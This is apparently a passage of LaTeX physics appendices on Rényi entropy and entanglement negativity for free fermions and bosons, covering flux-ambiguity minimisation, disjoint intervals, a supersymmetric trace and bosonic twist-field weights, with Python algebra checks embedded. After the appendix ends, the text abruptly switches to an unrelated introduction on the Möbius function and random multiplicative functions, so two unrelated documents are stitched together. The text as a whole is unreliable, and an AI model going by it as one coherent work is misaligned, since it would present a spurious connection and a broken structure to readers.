Z_{{\cal R}_n} =& \int \prod_k d\psi_k d\bar \psi_k \ \prod_k \left[ \rho(\bar\psi_k,\psi_k)\right] e^{\sum_{k} \lambda_k \bar\psi_{k} \psi_k },
\end{align}
where $\lambda_k=e^{i 2\pi \frac{k}{n}}$ for $k=-(n-1)/2,\cdots,(n-1)/2$ are the eigenvalues of the twist matrix. In this new basis, the transformation rule $\Psi\to T\Psi$ for the field passing through the interval becomes a phase twist, i.e., $\psi_k \mapsto \lambda_k \psi_k$. Therefore, the REE can be decomposed into a product of separate factors as
\begin{align}
Z_{{\cal R}_n} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z_{k,n},
\end{align}
where $Z_{k,n}$ is the partition function containing an interval with the twisting phase $2\pi k/n$.
We reformulate the partition function in the presence of phase twisting intervals in terms of a theory subject to an external gauge field which is a pure gauge everywhere (except at the points $u_{i}$ and
$v_{i}$ where it is vortex-like).
This is obtained by a singular gauge transformation
\begin{equation}
\psi_{k}(x)\to e^{i\int_{x_{0}}^{x}dx^{{\prime }\mu }A_{\mu }^{k}(x^{{\prime }})}\psi
_{k}\left( x\right),
\end{equation}
where $x_{0}$ is an arbitrary fixed point. Hence, for a subsystem made of $p$ intervals, $A = \bigcup_{i=1}^p [u_i, v_i]$, we can absorb the boundary conditions across the intervals into an external gauge field and the resulting Lagrangian density becomes
\begin{align} \label{eq:gauged_dirac}
{\cal L}_{k}=\bar{\psi}_{k}\gamma ^{\mu }\left( \partial _{\mu }+i\,A^k_{\mu}\right) \psi_{k},
\end{align}
where the $U(1)$ flux is given by
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{\mu }^{k}(x)=2\pi \frac{k}{n}
\sum_{i=1}^{p}\big[ \delta (x-u_{i})-\delta (x-v_{i})\big] \,. \label{eq:bRenyi}
\end{align}
Note that there is an ambiguity in the flux strength, namely, $2\pi
m$ (integer $m$) fluxes may be added to the right hand side of the above expression, while the monodromy for the fermion fields does not change. To preserve this symmetry (or redundancy), $Z_k$ must be written as a sum over all representations~\cite{Jin2004,Calabrese_gfc,Abanov,Ovchinnikov}.
The asymptotic behavior of each term in this expansion is a power law $\ell^{-\alpha_m}$ in the thermodynamic limit (large (sub-)system size).
Here, we are interested in the leading order term which corresponds to the smallest exponent $\alpha_m$.
As we will see in the case of entanglement negativity, we need to consider $m\neq 0$ for some values of $k$.
Let us first discuss this expansion for a generic case.
Let ${\cal S}_n$ denote the logarithm of the partition function on a multi-sheet geometry (for either the R\'enyi entropy or the negativity). As mentioned, after diagonalizing the twist matrices, ${\cal S}_n$ can be decomposed as
\begin{align}
{\cal S}_n= \sum_{k} \ln Z_k,
\end{align}
where $Z_k$ is the partition function in the presence of $2p$ flux vortices at the two ends of $p$ intervals between $u_{2i-1}$ and $u_{2i}$, that is
\begin{equation}
Z_{k}=\left\langle e^{i\int A_{k,\mu } j_{k}^{\mu }d^{2}x}\right\rangle \,,
\end{equation}
in which
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{k,\mu }(x)=2\pi
\sum_{i=1}^{2p} \nu_{k,i} \delta (x-u_{i}) \,,
\end{align}
and $2\pi \nu_{k,i}$ is the vorticity of the gauge flux, determined by the eigenvalues of the twist matrix.
The total vorticity satisfies the neutrality condition $\sum_i \nu_{k,i}=0$ for a given $k$.
In order to obtain the asymptotic behavior, one needs to take the sum over all the representations of $Z_k$ (i.e., flux vorticities mod $2\pi$),
\begin{align}
{Z}_k= \sum_{\{m_i\}} Z_k^{(m)}
\end{align}
where $\{m_i\}$ is a set of integers and
\begin{equation}
Z^{(m)}_{k}=\left\langle e^{i\int A_{k,\mu }^{(m)}j_{k}^{\mu }d^{2}x}\right\rangle \,,
\end{equation}
is the partition function for the following fluxes,
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{k,\mu }^{(m)}(x)=2\pi
\sum_{i=1}^{2p} \widetilde\nu_{k,i} \delta (x-u_{i}),
\end{align}
and $\widetilde\nu_{k,i}=\nu_{k,i}+ m_i$ are shifted flux vorticities.
The neutrality condition requires $\sum_{i} m_{i}=0$. Using the bosonization technique, we obtain
\begin{align}
Z_k^{(m)} = C_{\{m_i\}} \prod_{i<j} |u_i-u_j|^{2\widetilde\nu_{k,i}\widetilde\nu_{k,j}},
\end{align}
where $C_{\{m_i\}}$ is a constant depending on the cutoff and microscopic details. We make use of the neutrality condition $-2\sum_{i<j} \widetilde\nu_{k,i}\widetilde\nu_{k,j} = \sum_{i} \widetilde\nu_{k,i}^2$ and rewrite
\begin{align}
Z_k &\sim \sum_{\{m_i\}} C_{\{m_i\}}\ \ell^{2\sum_{i<j} \widetilde\nu_{k,i}\widetilde\nu_{k,j} }
= \sum_{\{m_i\}} C_{\{m_i\}}\ \ell^{-\sum_{i} \widetilde\nu_{k,i}^2 }
\label{eq:scaling}
\end{align}
where $\ell$ is a length scale.
From this expansion, the leading order term in the limit $\ell\to \infty$ is clearly the one(s) which minimizes the quantity $\sum_{i} \widetilde\nu_{k,i}^2$. This is identical to the condition derived from the generalized Fisher-Hartwig conjecture~\cite{BasTr,Basor1979}.
A careful determination of the leading order term for REE by a similar approach was previously discussed in Ref.~\cite{Calabrese_gfc,Abanov,Ovchinnikov}.
We now carry out this process for ${Z}_{{\cal N}_n}^{({\rm ns})}$ in Eq.~(\ref{eq:ZRk_NS}) for two adjacent intervals.
Here, we need to minimize the quantity
\begin{align}
f_{m_1m_2m_3}(\nu)=(\nu+m_1)^2+(\nu+m_3)^2+(-2\nu+m_2)^2
\end{align}
for a given $\nu=k/n=-(n-1)/2n,\cdots,(n-1)/2n$ by finding the integers $(m_1,m_2,m_3)$ constrained by $\sum_i m_i=0$.
For instance, let us compare $(0,0,0)$ with $(-1,1,0)$,
\begin{align}
f_{000}(\nu) &= 6\nu^2, \\
f_{-110}(\nu) &= 6\nu^2-6\nu+2.
\end{align}
So, we have
\begin{align}
f_{000}(\nu) > f_{-110}(\nu) \qquad \text{for} \quad \nu>\frac{1}{3}.
\end{align}
Similarly, we find that
\begin{align}
f_{000}(\nu) > f_{1-10}(\nu) \qquad \text{for} \quad \nu<-\frac{1}{3}.
\end{align}
In summary, we resolve the flux ambiguity by adding the triplet $(m_1,m_2,m_3)$ as follows
\begin{align}
\left\{ \begin{array}{lll}
(0,0,0) & & |\nu|\leq 1/3 \\
(-1,1,0), (0,1,-1) & & \nu>1/3 \\
(1,-1,0), (0,-1,1) & & \nu<-1/3 .
\end{array} \right.
\end{align}
This leads us to write Eq.~(\ref{eq:Z_NS_adjacent}). Finally, a similar derivation can be carried out to arrive at Eqs.~\eqref{eq:Z_NS_bi}, \eqref{eq:Z_R_ad} and \eqref{eq:b_ZRk_R}.
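As a sanity check on this minimization (our own addition, not part of the derivation), a short brute-force search over neutral integer triplets reproduces the table above; the helper names are ours.

```python
from itertools import product

def f(nu, m1, m2, m3):
    # f_{m1 m2 m3}(nu) = (nu + m1)^2 + (nu + m3)^2 + (-2 nu + m2)^2
    return (nu + m1) ** 2 + (nu + m3) ** 2 + (-2 * nu + m2) ** 2

def minimizers(nu, bound=3):
    """All neutral triplets (m1 + m2 + m3 = 0) attaining the minimum of f."""
    ms = [m for m in product(range(-bound, bound + 1), repeat=3) if sum(m) == 0]
    fmin = min(f(nu, *m) for m in ms)
    return sorted(m for m in ms if abs(f(nu, *m) - fmin) < 1e-12)

assert minimizers(0.2) == [(0, 0, 0)]                 # |nu| < 1/3
assert minimizers(0.45) == [(-1, 1, 0), (0, 1, -1)]   # nu > 1/3
assert minimizers(-0.45) == [(0, -1, 1), (1, -1, 0)]  # nu < -1/3
```

Note the twofold degeneracy of the minimizing triplets away from $|\nu|\leq 1/3$, as in the table.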
\section{R\'enyi negativity for disjoint intervals}
In this appendix, we derive the RN associated with ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ for two disjoint intervals and show that upon taking the distance between the intervals to zero, we recover the results for two adjacent intervals as discussed in the main text.
\label{app:moments}
\subsection{Moments of $\rho^{{T}_A}$}
This geometry is characterized by $v_A-u_A=\ell_1$, $u_B-v_A=d$, and $v_B-u_B=\ell_2$ (cf.~Fig.~\ref{fig:Zns_vs_l_dis}(a)).
The leading order term of the momentum decomposed partition function in the case of disjoint intervals is given by
\begin{align} \label{eq:ns_dis}
Z_{k,n}^{(\text{ns})}= c_{k0} \left(\frac{x}{\ell_1\ell_2}\right)^{2k^2/n^2} +\cdots
\end{align}
where
\begin{align} \label{eq:x_ratio}
x =\frac{(\ell_1+\ell_2+d)d}{(\ell_1+d)(\ell_2+d)}.
\end{align}
Consequently, the RN is found to be
\begin{align}
{\cal N}_n^{({\rm ns})}&= \left(\frac{n^2-1}{6n}\right) \ln \left(\frac{x}{\ell_1\ell_2}\right) + \cdots
\end{align}
We compare the above formula with the scaling behavior of the numerical results in Fig.~\ref{fig:Zns_vs_l_dis}(b), where we find that they match.
As a consistency check, we show that the RN between adjacent intervals can be derived as a limiting behavior of
the disjoint intervals. However, we realize from (\ref{eq:ns_dis}) that $\lim_{d\to 0} Z_{k,n}^{(\text{ns})}=0$ (as was also observed in Ref.~\cite{Herzog2016}).
A more careful treatment takes into account the higher order terms coming from different representations in \eqref{eq:scaling},
\begin{align}
Z_{k,n}^{(\text{ns})}&=
c_{k0} \left(\frac{x}{\ell_1\ell_2}\right)^{2\frac{k^2}{n^2}}
+ c_{k1} \left(\frac{x}{\ell_1\ell_2}\right)^{2|\frac{k}{n}|(|\frac{k}{n}|-1)} \left[
g(\ell_1,\ell_2;k/n)+ g(\ell_1+d,\ell_2+d;k/n)\right] + \cdots
\label{eq:NS_disjoint_expansion}
\end{align}
where
$g(x,y;q)=x^{-2} \left(x/y\right)^{2|q|}+x\leftrightarrow y$
and $c_{ki}$ are coefficients dependent on the microscopic details.
Next, we obtain the leading order term in the coincident limit $d=\varepsilon$, where $\varepsilon\ll \ell_1,\ell_2$. To this end, we rewrite the above expansion (\ref{eq:NS_disjoint_expansion}) as
\begin{align}
Z_{k,n}^{(\text{ns})}=\varepsilon^{2k^2/n^2} Z_{k,n}^{(0)}+\varepsilon^{2|k/n|(|k/n|-1)} Z_{k,n}^{(1)} + \cdots
\end{align}
where the scaling dimensions are
\begin{subequations}
\begin{align}
[Z_{k,n}^{(0)}] &\sim L^{-6k^2/n^2}, \\
[Z_{k,n}^{(1)}] &\sim L^{-2(3k^2/n^2-3|k/n|+1)}.
\end{align}
\end{subequations}
As we see, for $|k/n|>1/3$, the second term is dominant. This immediately implies that upon taking $(\ell_i+d)\sim \ell_i$, we recover the original result (\ref{eq:Z_NS_adjacent}).
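The crossover can be seen directly by comparing the two $\ell$-exponents (a quick check we add; variable names are ours):

```python
def exp_first(q):
    # ell-exponent of the eps^{2k^2/n^2} Z^{(0)} term, with q = k/n
    return -6.0 * q * q

def exp_second(q):
    # ell-exponent of the eps^{2|q|(|q|-1)} Z^{(1)} term
    return -2.0 * (3.0 * q * q - 3.0 * abs(q) + 1.0)

assert exp_second(0.2) < exp_first(0.2)   # |q| < 1/3: first term dominates
assert exp_second(0.5) > exp_first(0.5)   # |q| > 1/3: second term dominates
assert abs(exp_second(1.0 / 3.0) - exp_first(1.0 / 3.0)) < 1e-12  # crossover
```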
\subsection{Moments of $\rho^{\widetilde{T}_A}$}
Similarly, we find the $k$-th contribution to the $n$-th moment of $\rho^{\widetilde{T}_A}$ to be
\begin{align}
Z_{k,n}^{(\text{r})} =
x^{2|k/n|(|k/n|-1/2)} \frac{1}{\ell_1^{2(|k/n|-1/2)^2} \ell_2^{2k^2/n^2}} +\cdots
\label{eq:R_disjoint_expansion}
\end{align}
which gives rise to the following form for the RN,
\begin{align}
\label{eq:R_disjoint}
{\cal N}_n^{({\rm r})} &=
c^{(1)}_n \ln (\ell_1)+ c^{(2)}_n \ln (\ell_2)
+ c^{(3)}_n \ln (x)
+ \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n}
&=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o+ \frac{2}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( {n_e}- \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}, \
\end{array}
\right.\\
c^{(2)}_{n} & = - \left( \frac{n^2-1}{6n} \right), \\
c^{(3)}_{n}
& =
\left\{
\begin{array}{ll}
-\frac{1}{12} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
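These coefficients follow from summing the exponents of Eq.~(\ref{eq:R_disjoint_expansion}) over the eigenvalue index $k=-(n-1)/2,\dots,(n-1)/2$; the following exact-arithmetic sketch (our addition) confirms the even/odd formulas:

```python
from fractions import Fraction

def ks(n):
    # k = -(n-1)/2, ..., (n-1)/2 (half-integers for even n)
    return [Fraction(2 * j - (n - 1), 2) for j in range(n)]

def c1(n):  # coefficient of ln(ell_1): -sum_k 2 (|k/n| - 1/2)^2
    return -sum(2 * (abs(k) / n - Fraction(1, 2)) ** 2 for k in ks(n))

def c2(n):  # coefficient of ln(ell_2): -sum_k 2 (k/n)^2
    return -sum(2 * k * k / n ** 2 for k in ks(n))

def c3(n):  # coefficient of ln(x): sum_k 2 |k/n| (|k/n| - 1/2)
    return sum(2 * abs(k) / n * (abs(k) / n - Fraction(1, 2)) for k in ks(n))

for n in range(2, 11):
    assert c2(n) == -Fraction(n * n - 1, 6 * n)
    if n % 2:
        assert c1(n) == -Fraction(1, 6) * (n + Fraction(2, n))
        assert c3(n) == -Fraction(1, 12) * (n - Fraction(1, n))
    else:
        assert c1(n) == -Fraction(1, 6) * (n - Fraction(1, n))
        assert c3(n) == -Fraction(1, 6) * (Fraction(n, 2) + Fraction(1, n))
```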
We compare the scaling behaviors of analytical expressions and numerical results in Fig.~\ref{fig:Zns_vs_l_dis}(c). As we see, they are in good agreement.
It is easy to verify that taking the adjacent limit $d= \varepsilon$ of two disjoint intervals in Eq.~(\ref{eq:R_disjoint}) leads to Eq.~(\ref{eq:R_adjacent}).
We should note that in this case the leading order term in the momentum expansion (\ref{eq:R_disjoint_expansion}) always remains the same, in contrast with the previous case (\ref{eq:NS_disjoint_expansion}).
\begin{figure}
\center
\includegraphics[scale=.93]{Nn_scaling_disjoint}
\caption{\label{fig:Zns_vs_l_dis}
Comparison of numerical (dots) and analytical (solid lines) results for the scaling behavior of the moments of partial transpose (\ref{eq:pTR_NS}) and (\ref{eq:pTR_R}) for two disjoint intervals (the geometry is shown in panel (a)). Here, $d=40$ and the intervals have equal lengths $\ell_1=\ell_2=\ell$ with $20\leq \ell\leq 200$ on an infinite chain. The analytical results are given by Eq.~\eqref{eq:ns_dis} in panel (b) and Eq.~\eqref{eq:R_disjoint_expansion} in panel (c). Different colors correspond to different moments $n$.}
\end{figure}
\section{Partial transpose with supersymmetric trace}
\label{app:susy}
Let
\begin{align}
\label{eq:moments_susy}
{\cal N}_n^{({\rm susy})} (\rho)=\ln \widetilde{\text{Tr}} [(\rho^{\widetilde{T}_A})^n],
\end{align}
where $\widetilde{\text{Tr}}$ is the supersymmetric (susy) trace for the interval $A$.
The susy trace differs from the regular trace in the $T$ matrix that glues together the copies of $\rho^{\widetilde{T}_A}$: for the regular fermionic trace it is given by (\ref{eq:Tmat}), while for the susy trace it is the bosonic one (\ref{eq:Tmat_b}) (see below), even though it acts on a fermionic density matrix. It is
easy to see that $T^n=(-1)^{n-1}$ for the regular trace of fermionic density
matrices whereas $T^{n}=1$ for the susy trace. Clearly, there is no difference
between the susy and regular traces for even $n$ when considering $(\rho^{\widetilde{T}_A})^n$. The susy trace was used
previously to define the susy entanglement entropies~\cite{Giveon2016}.
(See Refs.\ \cite{2013JHEP...10..155N, 2016JHEP...03..058M, 2018RvMP...90c5007N} for related works.)
In terms of the partial transpose (\ref{eq:fermion_pt}), the susy trace is simplified into
\begin{align} \label{eq:pathTR0}
{\cal N}_n^{({\rm susy})} (\rho) =\left\{ \begin{array}{ll}
\ln \text{Tr} (\rho^{T_A} \rho^{T_A\dag} \cdots \rho^{T_A}\rho^{T_A\dag})& \ \ n\ \text{even}, \\
\ln \text{Tr} (\rho^{T_A} \rho^{T_A\dag} \cdots \rho^{T_A}) & \ \ n\ \text{odd},
\end{array} \right.
\end{align}
which was studied by some of us in~\cite{Shap_pTR} and was shown to obey the same expressions as the bosonic negativity~\cite{Calabrese2013} for both even and odd values of $n$. In this appendix, we briefly report the results for various geometries.
A technical point is that the monodromy of the field around $ {\widetilde{\cal T}}_{k,n} $ for the susy trace is given by $\psi_k\mapsto e^{\pm i(2\pi k/n-\varphi_n)} \psi_k$ where $\varphi_n=\pi$ or $\pi (n-1)/n$ for $n$ even or odd, respectively~\cite{Herzog2016,Shap_temp}.
\vspace{0.3cm}
\noindent
\textbf{1. Disjoint intervals:} in this case the moments \eqref{eq:moments_susy} become
\begin{align}
{\cal N}_n^{({\rm susy})} &=
c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (x)
+ \cdots
\end{align}
where $x$ is defined in (\ref{eq:x_ratio}),
$c^{(1)}_{n} = -(n^2-1)/6n$,
and
\begin{align}
c^{(2)}_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{12} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\vspace{0.3cm}
\noindent
\textbf{2. Adjacent intervals:} when the distance $d \to 0$, i.e., $x \to 0$ in the above expression, the moments take the form
\begin{align}
{\cal N}_n^{({\rm susy})}
&= c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n_o} &=c^{(2)}_{n_o} = -\frac{1}{12} \left( n_o- \frac{1}{n_o} \right),
\end{align}
for odd $n=n_o$, and
\begin{align}
c^{(1)}_{n_e} & = -\frac{1}{6} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right), \\
c^{(2)}_{n_e} &= -\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right),
\end{align}
for even $n=n_e$.
\vspace{0.5cm}
\noindent
\textbf{3. Bipartite geometry:} finally, in this case one has
\begin{align}
{\cal N}_n^{({\rm susy})}&= c_n \ln (\ell_1) + \cdots
\end{align}
where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o- \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{3} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\section{Negativity of bosonic scalar field theory}
\label{app:bosonic}
As we have seen in the main text, calculating negativity boils down to computing correlators of twist fields.
In this appendix, we briefly review the conformal weights of the twist fields in the complex scalar field theory,
\begin{align} \label{eq:scalar}
{\cal L}_\phi=\frac{1}{4\pi} \int |\nabla \phi|^2,
\end{align}
from which we can compute the correlators of twist fields and derive expressions for the entanglement of free bosons.
Similar to the fermionic case, the moments of the density matrix in the coherent-state basis read
\begin{align}
Z_{{\cal R}_n}=\text{Tr}[\rho^n] =& \int \prod_{i=1}^n d\phi_i d \phi^\ast_i \ \prod_{i=1}^n \left[ \rho(\phi^\ast_i,\phi_i)\right] e^{\sum_{i,j} \phi^\ast_i T_{ij} \phi_j },
\end{align}
where
\begin{align} \label{eq:Tmat_b}
T=\left(\begin{array}{cccc}
0 & 1 & 0 & \dots \\
0 & 0 & 1 & 0 \\
\vdots & \vdots & \ddots & 1 \\
1 & 0 & \cdots & 0 \\
\end{array} \right).
\end{align}
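As an illustrative check (our addition), one can diagonalize this cyclic matrix numerically; under the assumption that the fermionic twist matrix of Eq.~(\ref{eq:Tmat}) is the same matrix with corner entry $(-1)^{n-1}$, consistent with $T^n=(-1)^{n-1}$, the same code also reproduces the eigenvalues $e^{2\pi i k/n}$ with $k=-(n-1)/2,\dots,(n-1)/2$ quoted in Appendix~\ref{app:bosonization}:

```python
import numpy as np

def twist_matrix(n, corner=1.0):
    """Cyclic gluing matrix: T[i, i+1] = 1, T[n-1, 0] = corner."""
    T = np.diag(np.ones(n - 1), k=1)
    T[-1, 0] = corner
    return T

def spectrum_matches(T, ks, n):
    """Check eigvals(T) = {exp(2 pi i k / n) : k in ks} as multisets."""
    eig = np.linalg.eigvals(T)
    return all(np.min(np.abs(eig - np.exp(2j * np.pi * k / n))) < 1e-8 for k in ks)

n = 6
# Bosonic twist matrix (eq:Tmat_b): T^n = 1, eigenvalues exp(2 pi i k/n), k = 0..n-1.
Tb = twist_matrix(n, corner=1.0)
assert np.allclose(np.linalg.matrix_power(Tb, n), np.eye(n))
assert spectrum_matches(Tb, np.arange(n), n)

# Hypothetical fermionic variant with corner (-1)^(n-1), so that T^n = (-1)^(n-1);
# its eigenvalues are exp(2 pi i k/n) with k = -(n-1)/2, ..., (n-1)/2.
Tf = twist_matrix(n, corner=(-1.0) ** (n - 1))
assert np.allclose(np.linalg.matrix_power(Tf, n), (-1.0) ** (n - 1) * np.eye(n))
assert spectrum_matches(Tf, np.arange(n) - (n - 1) / 2, n)
```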
For the moments of the partial transpose, we have
\begin{align}
{Z}_{{\cal N}_n}=\text{Tr}[({\rho^{T_A}} )^n] =& \int \prod_{i=1}^n d\phi_i d \phi^\ast_i \ \prod_{i=1}^n \left[ \rho(\phi^\ast_i,\phi_i)\right]
e^{\sum_{i,j} {\phi^A_i}^{\ast} [ T^{-1}]_{ij} \phi_j^{A} }
e^{\sum_{i,j} {\phi^B_i}^{\ast} T_{ij} \phi_j^{B} }.
\label{eq:pTR_b}
\end{align}
In the case of free bosons, the moments can be written as a product of partition functions of decoupled modes,
\begin{align}
Z_{{\cal R}_n} &= \prod_{k=0}^{n-1} \langle {\cal T}_{k,n}^{-1} (0) {\cal T}_{k,n}(\ell) \rangle, \\
{Z}_{{\cal N}_n} &= \prod_{k=0}^{n-1} \langle {\cal T}_{k,n}^{-1} (-\ell_1) {\cal T}_{k,n}^2(0) {\cal T}_{k,n}^{-1}(\ell_2) \rangle.
\end{align}
Hence, our objective here is to find the conformal weight of ${\cal T}_{k,n}$, ${\cal T}_{k,n}^2$, and their adjoints. It is worth noting that in the case of bosons $k$ takes non-negative integer values, $k=0,1,\cdots, n-1$. This is because the global boundary condition is periodic, i.e.~the twist matrix obeys $T^n=1$.
As usual in conformal field theory, the computation proceeds by placing a twist field ${\cal T}_{k,n}$ at the origin, which leads to a ground state ${\cal T}_{k,n}(0) \ket{0}$ where $\phi(z)$ and $ \phi^\ast(z)$ are multivalued fields with the boundary conditions $\phi(e^{i2\pi} z)=e^{i2\pi k/n} \phi(z)$ and $\phi^\ast (e^{i2\pi} z)=e^{-i2\pi k/n} \phi^\ast(z)$.
Next, we compute the correlator
\begin{align}
\braket{\partial_z \phi \partial_w \phi^\ast}_{k/n} := \braket{{\cal T}_{k,n}^{-1}(\infty)|\partial_z \phi \partial_w \phi^\ast |{\cal T}_{k,n}(0)}, \label{eq:bos_corr}
\end{align}
to find the expectation value of the energy-momentum tensor via
\begin{align}
\braket{ T(z) }_{k/n} &= - \lim_{z\to w} \left\langle \frac{1}{2} \partial_z \phi \partial_w \phi^\ast + \frac{1}{(z-w)^2} \right\rangle_{k/n}.
\end{align}
Using the fact that
\begin{align}
T(z) {\cal T}_{k,n}(0)\ket{0} \sim \frac{\Delta_{{\cal T}_{k,n}}}{z^2} {\cal T}_{k,n}(0) \ket{0} +\cdots
\end{align}
we can read off the conformal weight $\Delta_{{\cal T}_{k,n}}$.
Let us start with ${\cal T}_{k,n}$ and ${\cal T}_{k,n}^{-1}$. The correlation function~(\ref{eq:bos_corr}) can be directly computed by the mode expansion of $\phi$ field or can be simply derived from the asymptotic behavior $z\to w$ and $z\to 0$ or $w\to \infty$. The result is found to be~\cite{Dixon1987,Calabrese_disjoint},
\begin{align}
-\frac{1}{2} \braket{\partial_z \phi \partial_w \phi^\ast}_{k/n} &= z^{k/n-1} w^{-k/n} \left[\frac{z(1-k/n)+wk/n}{(z-w)^2}\right],
\end{align}
which leads to
\begin{align} \label{eq:b_twist_dim}
\Delta_{{\cal T}_{k,n}}=\Delta_{{\cal T}_{k,n}^{-1}}= \frac{k}{2n}\left(1-\frac{k}{n}\right).
\end{align}
We should note that doing this calculation for complex Dirac fermions, instead, leads to $\Delta_{{\cal T}_{k,n}}= k^2/2n^2$.
So, the R\'enyi entropies are given by
\begin{align}
{\cal R}_n = \frac{2}{n-1} \sum_{k=0}^{n-1} \Delta_{{\cal T}_{k,n}} \cdot \ln\ell
&=\left(\frac{n+1}{6n}\right) \ln \ell.
\end{align}
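The sum of these weights can be verified with exact rational arithmetic (a consistency check we add; note the prefactor $2/(n-1)$, which makes the entropy positive):

```python
from fractions import Fraction

def delta(k, n):
    # Conformal weight of the bosonic twist field: (k/2n)(1 - k/n).
    q = Fraction(k, n)
    return q / 2 * (1 - q)

for n in range(2, 12):
    total = sum(delta(k, n) for k in range(n))
    assert total == Fraction(n * n - 1, 12 * n)
    # R_n = 2/(n-1) * sum_k Delta * ln(l) = (n+1)/(6n) * ln(l)
    assert Fraction(2, n - 1) * total == Fraction(n + 1, 6 * n)
```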
One can do a similar calculation for ${\cal T}_{k,n}^2$. In this case, the boundary condition is
$\phi(e^{i2\pi} z)=e^{i4\pi k/n} \phi(z)$.
For $k/n<1/2$, the result is identical to (\ref{eq:b_twist_dim}) up to replacing $k/n$ by $2k/n$. For $1/2<k/n<1$ however, the effective phase shift is $2\pi(2k/n-1)$ and we need to substitute $k/n$ in (\ref{eq:b_twist_dim}) by $2k/n-1$. This result can also be understood from the mode expansion. Consequently, we arrive at
\begin{align}
\arraycolsep=1.4pt\def\arraystretch{1.4}
\Delta_{{\cal T}_{k,n}^2}=\Delta_{{\cal T}_{k,n}^{-2}}=\left\{
\begin{array}{ll}
\frac{k}{n}\left(1-\frac{2k}{n}\right) &\ \ \ \frac{k}{n} \leq \frac{1}{2},\\
\left(\frac{2k}{n}-1\right)\left(1-\frac{k}{n}\right) &\ \ \ \frac{1}{2}\leq \frac{k}{n} <1.
\end{array}
\right.
\end{align}
Using the following expression for the moments of partial transpose,
\begin{align}
{\cal N}_n &= c^{(1)}_n \ln (\ell_1 \ell_2)
+ c^{(2)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
we find
\begin{align}
\arraycolsep=1.4pt\def\arraystretch{1.4}
-c_n^{(1)}=\sum_{k=0}^{n-1} \Delta_{{\cal T}_{k,n}^2} =
\left\{
\begin{array}{ll}
\frac{n^2-4}{12 n} &\ \ \ n\ \ \text{even} \\
\frac{n^2-1}{12 n} &\ \ \ n\ \ \text{odd}
\end{array}
\right.
\end{align}
and
\begin{align}
\arraycolsep=1.4pt\def\arraystretch{1.4}
-c_n^{(2)}=\sum_{k=0}^{n-1}( 2\Delta_{{\cal T}_{k,n}}-\Delta_{{\cal T}_{k,n}^2}) =
\left\{
\begin{array}{ll}
\frac{n^2+2}{12 n} &\ \ \ n\ \ \text{even} \\
\frac{n^2-1}{12 n} &\ \ \ n\ \ \text{odd}
\end{array}
\right.
\end{align}
which are the familiar results~\cite{Calabrese2013}.
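Both piecewise sums can be verified exactly (our own consistency check of the formulas above):

```python
from fractions import Fraction

def delta1(k, n):
    q = Fraction(k, n)
    return q / 2 * (1 - q)          # weight of T_{k,n}

def delta2(k, n):
    q = Fraction(k, n)              # weight of T^2_{k,n}, piecewise in k/n
    return q * (1 - 2 * q) if q <= Fraction(1, 2) else (2 * q - 1) * (1 - q)

def c_one(n):
    return -sum(delta2(k, n) for k in range(n))

def c_two(n):
    return -sum(2 * delta1(k, n) - delta2(k, n) for k in range(n))

for n in range(2, 13):
    if n % 2 == 0:
        assert c_one(n) == -Fraction(n * n - 4, 12 * n)
        assert c_two(n) == -Fraction(n * n + 2, 12 * n)
    else:
        assert c_one(n) == c_two(n) == -Fraction(n * n - 1, 12 * n)
```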
\end{appendix}
Many arithmetic functions of interest are multiplicative, for example, the M\"obius function, the Dirichlet characters, or the Liouville function, which is equal to $(-1)^k$ on integers with $k$ prime factors, counted with multiplicity. The behavior of such functions is far from being known with complete accuracy, even if partial results have been proven. This difficulty can be encoded by the corresponding Dirichlet series, which involve the Riemann zeta function. For example, the partial sum, up to $x$,
of the M\"obius function in known to be
negligible with respect to $x$, and it is conjectured to be negligible with respect to $x^{r}$ for all $r > 1/2$: the first statement can quite easily be proven to be equivalent to the prime number theorem, whereas the second is equivalent to the Riemann hypothesis.
It has been noticed that the same bound $x^r$ for all $r > 1/2$ is obtained if we take the partial sums of i.i.d., bounded and centered random variables. This suggests the naive idea of comparing the M\"obius function on square-free integers with i.i.d. random variables on $\{-1,1\}$. However, a major difference between the two situations is that in the random case, we lose the multiplicativity of the function.
A less naive randomized version of M\"obius functions can be obtained as follows: one takes i.i.d. uniform random variables on $\{-1,1\}$ on prime numbers, $0$ on prime powers of order larger than or equal to $2$, and one completes the definition by multiplicativity.
In \cite{W}, Wintner considers a completely multiplicative function with i.i.d. values at primes, uniform on $\{-1,1\}$ (which corresponds to a randomized version of the Liouville function rather than the M\"obius function), and proves that we have almost surely the same bound $x^{r}$ ($r > 1/2$) for the partial sums, as for the sums of i.i.d. random variables, or for the partial sums of M\"obius function if the Riemann hypothesis is true. The estimate in \cite{W} has been refined by Hal\'asz in \cite{Hal}.
